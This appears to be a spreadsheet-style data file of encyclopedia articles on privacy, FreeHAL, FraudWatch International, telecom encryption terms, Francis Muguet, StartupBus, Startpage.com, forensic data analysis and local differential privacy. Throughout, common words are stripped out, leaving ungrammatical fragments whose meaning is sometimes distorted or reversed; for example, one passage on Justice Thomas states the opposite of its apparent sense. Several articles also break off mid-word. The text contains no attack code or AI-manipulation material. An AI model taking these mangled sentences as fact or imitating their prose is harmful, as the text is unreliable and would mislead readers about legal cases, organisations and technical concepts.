    <t>privacy (uk: ability individual group seclude information themselves, thereby express selectively. when something private person, usually means something inherently special sensitive them. domain privacy partially overlaps security, include concepts appropriate protection information. privacy also take form bodily integrity. right subjected unsanctioned invasions privacy government, corporations, individuals part many countries' privacy laws, cases, constitutions. concept universal individual privacy modern concept primarily associated western culture, particularly british north american, remained virtually unknown cultures recent times. now, cultures recognize ability individuals withhold certain parts personal information wider society. with rise technology, debate regarding privacy shifted bodily sense digital sense. world become digital, conflicts regarding legal right privacy applicable. countries, right reasonable expectation digital privacy extended original right privacy, many countries, notably agency, federal trade commission, within european union (eu), passed acts protect digital privacy public private entities grant additional rights users technology. with rise internet, increase prevalence social bots, causing political polarization harassment. online harassment also spiked, particularly teenagers, consequently resulted multiple privacy breaches. selfie culture, prominence networks like facebook instagram, location technology, advertisements tracking methods also pose threats digital privacy. through rise technology immensity debate regarding privacy, various conceptions privacy, include right alone defined "the right privacy", first u.s. publication discussing privacy legal right, theory privacy paradox, describes notion users' online concerned privacy, reality, not. along various understandings privacy, actions reduce privacy, recent classification includes processing information, sharing information, invading personal space private information, defined daniel solove. conversely, order protect users's privacy, multiple steps taken, specifically practicing encryption, anonymity, taking measures bolster security data. history privacy historical roots ancient greek philosophical discussions. well-known aristotle's distinction spheres life: public sphere polis, associated political life, private sphere oikos, associated domestic life. united states, systematic treatises privacy appear 1890s, development privacy america. technology technology advanced, privacy protected violated changed case technologies, printing press internet, increased ability share information lead ways privacy breached. generally agreed first publication advocating privacy united states 1890 article samuel warren louis brandeis, "the right privacy", written mainly response increase newspapers photographs made possible printing technologies.in 1948, 1984, written george orwell, published. classic dystopian novel, 1984 describes life winston smith 1984, located oceania, totalitarian state. all-controlling party, party power brother, able control power mass surveillance limited freedom speech thought. george orwell provides commentary negative effects totalitarianism, particularly privacy censorship. parallels drawn 1984 modern censorship privacy, notable example large social media companies, rather government, able monitor user's data decide allowed said online censorship policies, ultimately monetary purposes.in 1960s, people began consider changes technology bringing changes concept privacy. vance packard's naked society popular book privacy discourse privacy time. addition, alan westin's privacy freedom shifted debate regarding privacy physical sense, government controls person's body (i.e. wade) activities wiretapping photography. important records became digitized, westin argued personal data becoming accessible person complete jurisdiction data, laying foundation modern discussion privacy.new technologies also create ways gather private information. example, united states, thought heat sensors intended used find marijuana-growing operations would acceptable. contrary popular opinion, 2001 kyllo united states (533 u.s. decided thermal imaging devices reveal previously unknown information without warrant indeed constitute violation privacy. 2019, developing corporate rivalry competing voice-recognition software, apple amazon required employees listen intimate moments faithfully transcribe contents. police government police citizens often conflict degree police intrude citizen's digital privacy. instance, 2012, supreme court ruled unanimously united states jones (565 u.s. 400), case antoine jones arrested drug possession using tracker placed without warrant, warrantless tracking infringes fourth amendment. supreme court also justified "reasonable expectation privacy" transportation since reasonable expectation privacy already established griswold connecticut (1965). supreme court also clarified fourth amendment pertain physical instances intrusion also digital instances, thus united states jones became landmark case.in 2014, supreme court ruled unanimously riley california (573 u.s. 373), david leon riley arrested pulled driving expired license tags police searched phone discovered tied shooting, searching citizen's phone without warrant unreasonable search, violation fourth amendment. supreme court concluded cell phones contained personal information different trivial items, went beyond state information stored cloud necessarily form evidence. riley california evidently became landmark case, protecting digital protection citizen's privacy confronted police.a recent notable occurrence conflict enforcement citizen terms digital privacy 2018 case, carpenter united states (585 u.s. ____). case, used cell phone records without warrant arrest timothy ivory carpenter multiple charges, supreme court ruled warrantless search cell phone records violated fourth amendment, citing fourth amendment protects "reasonable expectations privacy" information sent third parties still falls data included "reasonable expectations privacy".beyond enforcement, many interactions government citizens revealed either lawfully unlawfully, specifically whistleblowers. notable example edward snowden, released multiple operations related mass surveillance operations national security agency (nsa), discovered continues breach security millions people, mainly mass surveillance programs whether collecting great amounts data third party private companies, hacking embassies frameworks international countries, various breaches data, prompted culture shock stirred international debate related digital privacy. internet andrew grove, co-founder former intel corporation, offered thoughts internet privacy interview published 2000: privacy biggest problems electronic age. heart internet culture force wants find everything you. found everything hundred million others, that's valuable asset, people tempted trade commerce asset. this information people thinking called information age. legal discussions internet privacy internet brought concerns privacy computers permanently store records everything: "where every online photo, status update, twitter post blog entry stored forever", writes professor author jeffrey rosen.one first instances privacy discussed legal manner 1914, federal trade commission (ftc) established, federal trade commission act, whose initial goal promote competition amongst businesses prohibit unfair misleading businesses. however, since 1970s, become involved privacy enforcement, first instance ftc's implementation enforcement fair credit reporting (fcra), regulates credit card bureaus client's data grants consumer's credit card rights. addition fcra, implemented various important acts protect consumer privacy. example, passed children's online privacy protection (coppa) 1998, regulates services geared towards children thirteen, flags rule, passed 2010, warrants companies measures protect clients identity theft, clients become victims identity theft, steps alleviate consequences identity theft.in 2018, european union (eu)'s general data protection regulation (gdpr) went effect, privacy legislation replaced data protection directive 1995. gdpr requires consumers within must complete concise knowledge companies data right gain correct data companies stores regarding them, enforcing stricter privacy legislations compared data protection directive 1995. social networking several online social network sites (osns) among visited websites globally. facebook example, august 2015, largest social-networking site, nearly billion members, upload 4.75 billion pieces content daily. while twitter significantly smaller million registered users, library congress recently announced acquiring permanently storing entire archive public twitter posts since 2006.a review evaluation scholarly work regarding current state value individuals' privacy online social networking show following results: "first, adults seem concerned potential privacy threats younger users; second, policy makers alarmed large part users underestimate risks information privacy osns; third, case using osns services, traditional one-dimensional privacy approaches fall short". this exacerbated deanonymization research indicating personal traits sexual orientation, race, religious political views, personality, intelligence inferred based wide variety digital footprints, samples text, browsing logs, facebook likes.intrusions social media privacy known affect employment united states. microsoft reports percent u.s. recruiters human-resource professionals online research candidates, often using information provided search engines, social-networking sites, photo/video-sharing sites, personal sites blogs, twitter. they also report percent u.s. recruiters rejected candidates based internet information. this created need many candidates control various online privacy settings addition controlling online reputations, conjunction legal suits social media sites employers. selfie culture selfies popular today. search photos hashtag #selfie retrieves million results instagram million hashtag #me. however, modern corporate governmental surveillance, pose risk privacy. research study takes sample size 3763, researchers found users posting selfies social media, women generally greater concerns privacy men, users' privacy concerns inversely predict selfie behavior activity. online harassment after 1999 columbine shooting, violent video games music thought main influences killers, states began pass anti-bullying laws included cyber-bullying laws. suicide 13-year-old megan meier, meier harassed myspace, prompted missouri pass anti-harassment laws though perpetrators later declared innocent. through rise smartphones rise popularity social media facebook instagram, messaging, online forums, gaming communities, email, online harassment continued grow. 18-year-old jessica logan committed suicide 2009 boyfriend sent explicit photos various teenagers different high schools, harassed myspace, school passing anti-harassment laws. further notable occurrences digital privacy invaded include death tyler clementi amanda todd, whose death instigated canadian funding towards studies bullying legislation regarding cyber-bullying passed, problems regarding lack protection users risen, todd's mother herself, since bill allowed companies completely access user's data.all u.s. states passed laws regarding online harassment. adolescents aged 12–18 subject cyberbullying, according 2017 report conducted national center education statistics bureau justice. 2018 high schoolers subject cyberbullying according cdc's 2019 youth risk behavior surveillance system. accounts bots originate 1980s, known (internet relayed chat) served essential purposes stating date time time expand purposes, flagging copyright articles.forms social media, twitter, facebook, instagram, prevalent activity social bots, different bots, representing accounts human perform autonomous behavior degree. bots, especially malicious intent, became prevalent 2016 u.s. presidential election, trump clinton campaign millions bots essentially working account influence election. subsection bots would target assault certain journalists, causing journalists stop reporting matters since dreaded harassment. election, russian twitter bots, presenting midwestern swing-voter republicans used amplify spread misinformation. october 2020, data scientist emilio ferrara found tweets related 2016 election generated bots. following election, 2017 study revealed nearly million twitter accounts bots. furthermore, found approximately tweets related brexit produced bots. data indicates bots increased since 2016 election, ai-driven bots becoming hard detect, soon able emulate human-like behavior, able comment, submit comments regarding policy, etc. affecting political debate, outcomes election, user's perception online humans interact with.although bots used negative context politics described, many bots used protect online harassment. example, since 2020, facebook researchers developing web-enabled simulation (wes) bots emulate human behavior engineers data determine best correctives. privacy location-based services increasingly, mobile devices facilitate location tracking. this creates user privacy problems. user's location preferences constitute personal information. their improper violates user's privacy. recent study montjoye showed spatio-temporal points, approximate places times, enough uniquely identify 1.5m people mobility database. study shows constraints hold even resolution dataset low. therefore, even coarse blurred datasets provide little anonymity.several methods protect user privacy location-based services proposed, including anonymizing servers blurring information. methods quantify privacy also proposed, calculate equilibrium benefit providing accurate location information drawbacks risking personal privacy. advertising mobile devices when internet first introduced, internet became predominant medium advertising, shifting newspapers magazines. with growth digital advertisements, people began tracked using http cookies, data used target relevant audiences. since introduction iphones androids, data brokers also planted within apps, tracking. since growth cookies, resulting $350 billion digital industry especially focused mobile devices, digital privacy become main source concern many mobile users, especially rise privacy scandals, cambridge analytica scandal. recently, apple introduced features prohibit advertisers tracking user's data without consent, seen implementation pop-up notifications users decide extent company track behavior. google begun roll similar features, concerns risen privacy-conscious internet function without advertisers able data users form capital. apple precedent implementing stricter crackdown privacy, especially introduction pop-up feature, made harder businesses, especially small businesses, mediums, like facebook target relevant audiences, since advertisers longer relevant data. google, contrary apple, remained relatively crackdown, supporting cookies least 2023, privacy-conscious internet solution found. ethical controversies location privacy there scandals regarding location privacy. instance scandal concerning accuweather, revealed accuweather selling locational data. this consisted user's locational data, even opted within accuweather, tracked users’ location. accuweather sold data reveal mobile, company monetizes data related user's location. other international cases similar accuwrather case. 2017, leaky inside mcdelivery exposed private data, consisted home addresses, million users with rise scandals, many large american technology companies google, apple, facebook subjected hearings pressure u.s. legislative system. 2011, rise locational technology, senator franken wrote open letter steve jobs, noting ability iphones ipads record store users' locations unencrypted files, although apple denied this conflict perpetuated 2021; recent example u.s. state arizona found court case google mislead users stored location users regardless location settings. metadata ability online inquiries individuals expanded dramatically last decade. importantly, directly observed behavior, browsing logs, search queries, contents public facebook profile, automatically processed infer secondary information individual, sexual orientation, political religious views, race, substance use, intelligence, personality. australia, telecommunications (interception access) amendment (data retention) 2015 made distinction collecting contents messages sent users metadata surrounding messages. protection privacy internet covert collection personally identifiable information identified primary concern u.s. federal trade commission. although privacy advocates recommend deletion original third-party http cookies, anthony miyazaki, marketing professor florida international university privacy scholar, warns "elimination third-party cookie sites circumvented cooperative strategies third parties information transferred site's original domain cookies." december 2010, federal trade commission reviewing policy regarding issue relates behavioral advertising. legal right privacy most countries give citizens rights privacy constitutions. representative examples include constitution brazil, says "the privacy, private life, honor image people inviolable"; constitution south africa says "everyone right privacy"; constitution republic korea says "the privacy citizen shall infringed." italian constitution also defines right privacy. among countries whose constitutions explicitly describe privacy rights, court decisions interpreted constitutions intend give privacy rights. many countries broad privacy laws outside constitutions, including australia's privacy 1988, argentina's protection personal data 2000, canada's 2000 personal information protection electronic documents act, japan's 2003 personal information protection law.beyond national privacy laws, international privacy agreements. united nations universal declaration human rights says shall subjected arbitrary interference [their] privacy, family, home correspondence, attacks upon [their] honor reputation." organisation economic co-operation development published privacy guidelines 1980. european union's 1995 data protection directive guides privacy protection europe. 2004 privacy framework asia-pacific economic cooperation privacy protection agreement members organization. argument legal protection privacy argument legal protection privacy predominant landmark supreme court case, griswold connecticut, established reasonable expectation privacy. however, conservative justices consider privacy legal right, discussing 2003 case, lawrence texas (539 u.s. 558), supreme court justice antonin scalia consider privacy right, supreme court justice clarence thomas argued general right privacy" u.s. constitution 2007. many republican interest groups activists desire appointed justices like justice thomas scalia since uphold originalism, indirectly helps strengthen argument legal protection privacy. free market consumer protection approaches privacy can, broadly, divided categories: free market consumer protection.one example free market approach found voluntary oecd guidelines protection privacy transborder flows personal data. principles reflected guidelines, free legislative interference, analyzed article putting perspective concepts gdpr later european union.in consumer protection approach, contrast, claimed individuals time knowledge make informed choices, reasonable alternatives available. support view, jensen potts showed privacy policies reading level average person. country australia privacy 1988 administered office australian information commissioner. initial introduction privacy 1998 extended public sector, specifically federal government departments, information privacy principles. state government agencies also subject state based privacy legislation. this built upon already existing privacy requirements applied telecommunications providers (under part telecommunications 1997), confidentiality requirements already applied banking, legal patient doctor relationships.in 2008 australian reform commission (alrc) conducted review australian privacy produced report titled "for your information". recommendations taken implemented australian government privacy amendment (enhancing privacy protection) bill 2012. 2015, telecommunications (interception access) amendment (data retention) 2015 passed, controversy human rights implications role media. european union although comprehensive regulations data protection european union, study finds despite laws, lack enforcement institution feels responsible control parties involved enforce laws. european union also champions right forgotten concept support adoption countries. india since introduction aadhaar project 2009, resulted billion indians associated 12-digit biometric-secured number. aadhaar uplifted poor india providing form identity preventing fraud waste resources, normally government would able allocate resources intended assignees issues. with rise aadhaar, india debated whether aadhaar violates individual's privacy whether organization access individual's digital profile, aadhaar card became associated economic sectors, allowing tracking individuals public private bodies. aadhaar databases suffered security attacks well project also mistrust regarding safety social protection infrastructures. 2017, aadhar challenged, indian supreme court declared privacy human right, postponed decision regarding constitutionality aadhaar another bench. september 2018, indian supreme court determined aadhaar project violate legal right privacy. united kingdom united kingdom, possible bring action invasion privacy. action brought another tort (usually breach confidence) privacy must considered law. sometimes defence disclosure private information public interest. there however, information commissioner's office (ico), independent public body promote access official information protect personal information. they promoting good practice, ruling eligible complaints, giving information individuals organisations, taking action broken. relevant laws include: data protection 1998; freedom information 2000; environmental information regulations 2004; privacy electronic communications regulations 2003. also provided "personal information toolkit" online explains detail various ways protecting privacy online. united states although constitution explicitly include right privacy, individual well locational privacy implicitly granted constitution amendment. supreme court united states found guarantees penumbras implicitly grant right privacy government intrusion, example griswold connecticut wade. dobbs jackson women's health organization later overruled wade, supreme court justice clarence thomas characterizing griswold's penumbral argument "facial absurdity", casting doubt validity constitutional right privacy united states previous decisions relying united states, right freedom speech granted first amendment limited effects lawsuits breach privacy. privacy regulated privacy 1974, various state laws. privacy 1974 applies federal agencies executive branch federal government. certain privacy rights established united states legislation children's online privacy protection (coppa), gramm–leach–bliley (glb), health insurance portability accountability (hipaa). unlike eu-member states, recognize right privacy non-us citizens. un's special rapporteur right privacy, joseph cannataci, criticized distinction. conceptions privacy privacy contextual integrity theory contextual integrity defines privacy appropriate information flow, appropriateness, turn, defined conformance legitimate, informational norms specific social contexts. right alone 1890, united states jurists samuel warren louis brandeis wrote "the right privacy", article argued "right alone", using phrase definition privacy. this concept relies theory natural rights focuses protecting individuals. citation response recent technological developments, photography, sensationalist journalism, also known yellow journalism.there extensive commentary meaning "let alone", among ways, interpreted mean right person choose seclusion attention others wish right immune scrutiny observed private settings, one's home. although early vague legal concept describe privacy made easy design broad legal protections privacy, strengthened notion privacy rights individuals began legacy discussion rights limited access limited access refers person's ability participate society without individuals organizations collect information them.various theorists imagined privacy system limiting access one's personal information. edwin lawrence godkin wrote late 19th century "nothing better worthy legal protection private life, words, right every keep affairs himself, decide extent shall subject public observation discussion." adopting approach similar presented ruth gavison nine years earlier, sissela said privacy "the condition protected unwanted access others—either physical access, personal information, attention." control information control one's personal information concept "privacy claim individuals, groups, institutions determine when, how, extent information communicated others." generally, person consensually formed interpersonal relationship another person considered "protected" privacy rights respect person relationship with. charles fried said "privacy simply absence information minds others; rather control information ourselves. nevertheless, data, control information pressure. states privacy alan westin defined four states—or experiences—of privacy: solitude, intimacy, anonymity, reserve. solitude physical separation others; intimacy "close, relaxed; frank relationship individuals" results seclusion pair small group individuals. anonymity "desire individuals times 'public privacy.'" lastly, reserve "creation psychological barrier unwanted intrusion"; creation psychological barrier requires others respect individual's need desire restrict communication information concerning herself.in addition psychological barrier reserve, kirsty hughes identified three kinds privacy barriers: physical, behavioral, normative. physical barriers, walls doors, prevent others accessing experiencing individual. sense, "accessing" individual includes accessing personal information her.) behavioral barriers communicate others—verbally, language, non-verbally, personal space, body language, clothing—that individual want access experience her. lastly, normative barriers, laws social norms, restrain others attempting access experience individual. secrecy privacy sometimes defined option secrecy. richard posner said privacy right people "conceal information others might disadvantage".in various legal contexts, privacy described secrecy, conclusion reached: privacy secrecy, rights privacy apply information already publicly disclosed. when privacy-as-secrecy discussed, usually imagined selective kind secrecy individuals keep information secret private choose make information public private. personhood autonomy privacy understood necessary precondition development preservation personhood. jeffrey reiman defined privacy terms recognition one's ownership physical mental reality moral right self-determination. through "social ritual" privacy, social practice respecting individual's privacy barriers, social group communicates developing children exclusive moral rights bodies—in words, moral ownership body. this entails control active (physical) cognitive appropriation, former control one's movements actions latter control experience one's physical existence when.alternatively, stanley benn defined privacy terms recognition oneself subject agency—as individual capacity choose. privacy required exercise choice. overt observation makes individual aware object "determinate character" "limited probabilities." covert observation, hand, changes conditions individual exercising choice without knowledge consent.in addition, privacy viewed state enables autonomy, concept closely connected personhood. according joseph kufer, autonomous self-concept entails conception oneself "purposeful, self-determining, responsible agent" awareness one's capacity control boundary self other—that control access experience extent. furthermore, others must acknowledge respect self's boundaries—in words, must respect individual's privacy.the studies psychologists jean piaget victor tausk show that, children learn control access experience extent, develop autonomous self-concept. addition, studies adults particular institutions, erving goffman's study "total institutions" prisons mental institutions, suggest systemic routinized deprivations violations privacy deteriorate one's sense autonomy time. self-identity personal growth privacy understood prerequisite development sense self-identity. privacy barriers, particular, instrumental process. according irwin altman, barriers "define limit boundaries self" thus "serve help define [the self]." this control primarily entails ability regulate contact others. control "permeability" self's boundaries enables control constitutes self thus define self.in addition, privacy seen state fosters personal growth, process integral development self-identity. hyman gross suggested that, without privacy—solitude, anonymity, temporary releases social roles—individuals would unable freely express engage self-discovery self-criticism. such self-discovery self-criticism contributes one's understanding oneself shapes one's sense identity. intimacy analogous personhood theory imagines privacy essential part individual, intimacy theory imagines privacy essential part humans strengthened intimate relationships humans. because part human relationships includes individuals volunteering self-disclose personal information, area privacy apply.james rachels advanced notion writing privacy matters "there close connection ability control access information ability create maintain different sorts social relationships different people." protecting intimacy core concept sexual privacy, professor danielle citron argues protected unique form privacy. physical privacy physical privacy could defined preventing "intrusions one's physical space solitude." example legal basis right physical privacy u.s. fourth amendment, guarantees "the right people secure persons, houses, papers, effects, unreasonable searches seizures".physical privacy matter cultural sensitivity, personal dignity, and/or shyness. there also concerns safety, example wary becoming victim crime stalking. there different things prevented protect one's physical privacy, including people watching (even recorded images) one's intimate behaviours body parts unhautorized access one's personal possessions places. examples possible efforts used avoid former, especially modesty reasons, clothes, walls, fences, privacy screens, cathedral glass, window coverings, etc. organizational government agencies, corporations, groups/societies organizations desire keep activities secrets revealed organizations individuals, adopting various security practices controls order keep private information confidential. organizations seek legal protection secrets. example, government administration able invoke executive privilege declare certain information classified, corporation might attempt protect valuable proprietary information trade secrets. privacy self-synchronization privacy self-synchronization hypothesized mode stakeholders enterprise privacy program spontaneously contribute collaboratively program's maximum success. stakeholders customers, employees, managers, executives, suppliers, partners investors. when self-synchronization reached, model states personal interests individuals toward privacy balance business interests enterprises collect personal information individuals. individual right david flaherty believes networked computer databases pose threats privacy. develops 'data protection' aspect privacy, involves "the collection, use, dissemination personal information". this concept forms foundation fair information practices used governments globally. flaherty forwards idea privacy information control, "[i]ndividuals want left alone exercise control information used".richard posner lawrence lessig focus economic aspects personal information control. posner criticizes privacy concealing information, reduces market efficiency. posner, employment selling oneself labour market, believes like selling product. 'defect' 'product' reported f</t>
  </si>
  <si>
    <t>FreeHAL</t>
  </si>
  <si>
    <t>freehal distributed computing project build self-learning chatbot. this project longer active. name first, program called jeliza referring chatbot eliza joseph weizenbaum. stood java jeliza first programmed java. 2008, program renamed freehal programming language changed. since time name related computer film 2001: space odyssey. functionality freehal uses semantic network technologies like pattern recognition, stemming, part speech databases hidden markov models order imitate human behaviour. freehal learns autonomously. while communicating keyboard program extends database. currently, english german supported. freehal@home using boinc infrastructure, semantic networks program built. freehal@home appears terminated operations. awards 2008, program first prize category "most popular" chatterbox challenge, yearly competition different similar chatbots. publications there article freehal linux magazine, issue december 2008. german magazine com!, program cd/dvd list top-10-open-source programs month. sources linux-magazine issue com! magazine, issues 4/08 5/08 german) chatterbox challenge freehal boinc-stats</t>
  </si>
  <si>
    <t>FraudWatch International</t>
  </si>
  <si>
    <t>fraudwatch international internet security organization founded 2003 mainly specializes online fraud protection anti-phishing activities. headquarters privately owned company melbourne, australia offices london, dubai francisco. trent youl. activities company include anti-phishing, protection malware online brand protection, offering security service companies. fraudwatch international active sponsoring participating congresses cybercrime. also sponsors anti-phishing working group.the techniques used fraudwatch international include: anti-phishing techniques anti-vishing techniques anti-pharming techniques takedown fake domains takedown fake profiles social media references external links official website fraudwatch international</t>
  </si>
  <si>
    <t>List of telecommunications encryption terms</t>
  </si>
  <si>
    <t>this list telecommunications encryption terms. this list derived part glossary telecommunication terms published federal standard 1037c. also references further reading rutenbeck, jeff (2006). tech terms: every telecommunications digital media person know. elsevier, inc. isbn 0-240-80757-x kissel, richard (editor). (february, 2011). glossary information security terms (nist 7298 revision national institute standards technology. external links "federal standard 1037c." telecommunications: glossary telecommunication terms embedding security handsets would boost data usage report (2005) cellular-news.com wireless, telecom computer glossary cellular network perspectives</t>
  </si>
  <si>
    <t>Francis Muguet</t>
  </si>
  <si>
    <t>francis fabien michel muguet (1955–2009) french chemist advocated open access information. biography muguet graduated ph.d texas tech university thesis water chemistry 1992. advisor wilse robinson. also held degree. researcher ensta (école nationale supérieure techniques avancées) 1993 2009 worked, last months life, consultant international telecommunication union (itu) university geneva. defender free open access scientific content, chaired civil society scientific information working group, co-ordinated group patents, trademarks copyrights world summit information society (wsis).muguet also known designing pattern global patronage aims answer legal argument raised global license berne convention copyright. sponsorship supported friend richard stallman co-authored declaration louisiana workshop organized french society internet march 2009. muguet founders sard, society acceptance distribution gifts inspired principles global patronage. muguet active world network linguistic diversity point contact dynamic coalition linguistic diversity internet governance forum member icvolunteers. from 2001 2005, associate editor mdpi center basel. daughter found dead october answered mail several days. following announcement death, change made process printing book bataille hadopi, contributed, dedicating him. references external links "world network linguistic diversity". official site. archived original 2015-04-25. retrieved 2011-07-10. "coalition dynamique pour diversité linguistique". official site. "civil society scientific information working group". site. archived original 2010-11-30. retrieved 2010-09-22.</t>
  </si>
  <si>
    <t>StartupBus</t>
  </si>
  <si>
    <t>startupbus annual technological startup competition entrepreneurship boot camp, described hackathon, created elias bizannes february 2010. competition held across 3-day ride contestants "buspreneurs" compete conceive best technology startup. competition seeks attract young talents compete, search innovative startup conceived groups, winners determined panel judges. starting february 2011, gone many iterations various continents 2011 present day, first austin, texas subsequently north america, europe africa. startupbus receives extensive online media coverage platforms news, technology blogs news sites next web, venturebeat, wired techcrunch. live coverage competition also broadcast startupbus.tv livestream.startupbus held annual north american competition orleans, louisiana april 2018. history startupbus started joke elias bizannes bart jellema july 2009 start hackathon trip francisco austin sxsw conference. eventually, first launched february 2010, consisted strangers austin sxsw conference. during total startups conceived time bus. soon after, starting february 2011, startupbus officially annual technological startup competition. concept prior competition startupbus' start location determined voting facebook twitter since 2012, evident success. buspreneurs selected based invite-only basis indicating interest submission application proposal interview after, shortlisted. application open specializes field coding, designing business. pre-events organised competition bond buspreneurs objective create network like-minded people. competition format competition starts 72-hour ride determined start-off location destination, voted facebook twitter. each consists buspreneurs, comes equipped wi-fi, charging points tables among seats luxuries. through 72-hour ride, buspreneurs form teams members choosing work final product comes form viable applications presented panel judges submission competition day. winners funding kick-start idea prior winners startupbus able expand creations creating ones. power board startupbus however short supply wi-fi unstable times, making competition even tougher buspreneurs. on-board experienced mentors prior startupbus competitions, available help teams out. stops made buspreneurs gather feedback products, learn business environments rest night. sponsors activities board startupbus competition application upon acceptance subjected amount funding receive year. much possible, startupbus tries minimise application fees allow college students ability participate competition. sponsorship low, busprenuers also night lodging. routes startupbus competitions cover continents north america, europe, africa australasia countries. major events held since debut 2010. north america eight startupbus north america competitions held north america annually since debut 2010. europe startupbus europe competitions held europe since 2012. africa startupbus africa 2013's first africa total buspreneurs started journey november november 2013. started capital zimbabwe, harare final destination south africa, cape town global entrepreneurship week. pacific startupbus' first time australia since debut years done partnership sydstart. startupbus pacific 2014 started august 2014 september 2014 buspreneurs. startupbus pacific 2014 departed sydney melbourne canberra arriving destination sydstart's main 2014 sydney, australia. products successfully caught attention judges public dinner companion links business people looking company meal dinner, spexy.me allows people design print glasses order them, failpage converts error pages useful computer metrics companies. winners after three rounds judging, i.e. qualification, semi-final final rounds, winner chosen judges. north america europe africa startupbus africa 2013's winner workforce, mobile-powered planning application connection employees employers simplify workforce planning construction sites. platform links unskilled worker teams potential employers sms-based communication system. runners-up startupbus africa 2013 funeral.ly, funeral management application, bribed, application tackle bribery issues across africa. notable alum sterio.me, later accepted start chile accelerator featured africa guardian. pacific people sun, solar startup, announced winner startupbus pacific 2014. judges north america community startupbus community network people previously participated various startupbus competitions. startupbus community consists 1600 alumni around world interact play, work live together. notable alumni companies many alumni continued stay team hackathon pursue startups. alumni businesses raised $400 million funding, notable acquisitions facebook, andreessen horowitz microsoft. notable alumni companies include: founded startupbus wastebits smart host bridgefy founded startupbus teams alumni instacart major league hacking touchlab sunrise (acquired microsoft) branch (acquired facebook) mondo keen complion airpair wevue second everyday media reception startupbus received generally positive reception hackathon community. venturebeat described startupbus, according riders, "the mother hackathons", wired magazine called "the startupbus close blood sport silicon valley entrepreneurship gets. compressing time concept prototype, becomes pedal-to-the-metal business incubator." references external links</t>
  </si>
  <si>
    <t>Startpage.com</t>
  </si>
  <si>
    <t>startpage dutch search engine company highlights privacy distinguishing feature. website advertises allows users obtain google search results protecting users' privacy storing personal information search data removing trackers. startpage.com also includes anonymous view browsing feature allows users option open search results proxy increased anonymity. because company based netherlands, protected dutch european union privacy laws, thus legally accessible united states surveillance programs prism. startpage.com began sister company ixquick, metasearch engine founded 1998. websites merged 2016. october 2019, startpage received significant investment privacy group, subsidiary system1. history early history ixquick created 1998 david bodnick york city. initially, provided metasearch different directory search engines well images, news, engines. results sorted evaluating relevant search tools found query. surfboard holding company based zeist, netherlands, robert beens, acquired ixquick 2000. ixquick re-launched march 2005 features including redesigned metasearch algorithm.startpage.com began directory 2002 started mirroring ixquick following year. july 2009, company re-launched startpage.com fetch results google search engine. prior release browser version april 2015, startpage.com default search engine. merger recent history march 2016, ixquick.com merged startpage.com search engine. 2017, startpage fields estimated billion searches. company european companies opposed f.c.c. implementation policies ending neutrality.in october 2019, privacy group, owned adtech company system1, acquired majority stake startpage but, according company, "founders unilaterally reject potential technical change could negatively affect user privacy". maintaining headquarters operations netherlands, startpage continues protected dutch european union (eu) privacy laws.in 2020, vivaldi announced browser added startpage optional default search engine. privacy protection june 2006, following criticism google shopping, website began delete private details users. ixquick stated share personal information users search engines provider sponsored results. according york times' wirecutter, startpage store user's personal information search data. 2020 review website zdnet also states startpage "does track, log, share data searching history".in 2011, startpage received european privacy seal, european union–sponsored initiative indicates compliance laws regulations data security privacy series design technical audits. re-certified 2013 2015. company also completely ended recording user addresses since january 2009. because startpage based netherlands, also "not subject laws like patriot act, cannot forced comply dragnet surveillance programs, like prism." startpage also contributed €20,000 noyb, non-profit organization founded schrems, committed launching strategic court cases media initiatives support eu's general data protection regulation.the company also provides stand-alone proxy service, startpage.com proxy, incorporated startpage search engine. this feature, known anonymous view since 2018, allows users option open search results (except advertisements) proxy.startmail, founded 2014 startpage beens, developed offer privacy protecting email service. startmail also allows creation disposable permanent email aliases account. phil zimmermann, inventor encryption system startpage hired 2018 advise company privacy technology, also helped develop startmail's pgp-encrypted email service.since startpage.com collect user data, serve targeted advertising based user data history. company generates revenue search engine providing contextual advertising based keyword used perform search. features startpage uses results google, pays. july 2020, startpage allows searches languages, including bengali danish, dutch, english, finnish, french, german, italian, japanese, korean, norwegian, polish, portuguese, simplified traditional chinese, spanish, swedish turkish.the website tabs searches well tabs image video searches. november 2019, startpage added news. according company, news searches "not curated personalized" "every user looks term time gets news". references external links official website</t>
  </si>
  <si>
    <t>Forensic data analysis</t>
  </si>
  <si>
    <t>forensic data analysis (fda) branch digital forensics. examines structured data regard incidents financial crime. discover analyse patterns fraudulent activities. data application systems underlying databases referred structured data. unstructured data contrast taken communication office applications mobile devices. this data overarching structure analysis thereof means applying keywords mapping communication patterns. analysis unstructured data usually referred computer forensics. methodology analysis large volumes data typically performed separate database system analysis team. live systems usually dimensioned extensive individual analysis without affecting regular users. hand, methodically preferable analyze data copies separate systems protect analysis teams accusation altering original data. nature data, analysis focuses often content data database contained database interest database forensics applied. order analyze large structured data sets intention detecting financial crime takes least three types expertise team: data analyst perform technical steps write queries, team member extensive experience processes internal controls relevant area investigated company forensic scientist familiar patterns fraudulent behaviour. after initial analysis phase using methods explorative data analysis following phase usually highly iterative. starting hypothesis perpetrator might created personal advantage data analyzed supporting evidence. following hypothesis refined discarded. combination different databases, particular data different systems sources highly effective. these data sources either unknown perpetrator manipulated perpetrator afterwards. data visualization often used display results. references jörg meyer: forensische datenanalyse. edition. erich schmidt verlag, berlin 2012, isbn 978-3-50313-847-0. christian hlavica, klapproth, frank hülsberg fraud forensic accounting. gabler verlag, wiesbaden 2011, isbn 978-3-83491-429-3. external links cyber intelligence</t>
  </si>
  <si>
    <t>Local differential privacy</t>
  </si>
  <si>
    <t>local differential privacy (ldp) model differential privacy added restriction even adversary access personal responses individual database, adversary still unable learn much user's personal data. this contrasted global differential privacy, model differential privacy incorporates central aggregator access data.with society growing ever reliant digital world data driven decision making, smart devices collect extensive statistics analysis personal data threatens privacy users. driven data fusion analysis techniques exposes users become vulnerable attacks disclosure data era. privacy concern, local differential privacy possible solution. local differential privacy (ldp) seen widely recognized prevalent privacy model distributed architecture provide strong privacy guarantees user collecting analyzing data privacy leaks client server side. furthermore, pendant assumptions third-party servers, imposed cutting-edge research privacy protection risen prominence theoretical interests, also subsequently practical perspective. powerfulness, widely adopted alleviate privacy concerns user. history 2003, alexandre evfimievski, johannes gehrke, ramakrishnan srikant gave definition equivalent local differential privacy. 2008, kasiviswanathan gave formal definition conforming standard definition differential privacy. prototypical example locally differential private mechanism randomized response survey technique proposed stanley warner 1965, predating modern discussions privacy. warner's innovation introduction “untrusted curator” model, entity collecting data trustworthy. before users' responses sent curator, answers randomized controlled manner guaranteeing differential privacy allowing valid population-wide statistical inferences. applications relevance ever-growing data calls high demand artificial intelligence services edges privacy protection users. these services help preserve data privacy ways pushed research novel machine learning paradigms requirements. anomaly detection anomaly detection, formally defined process 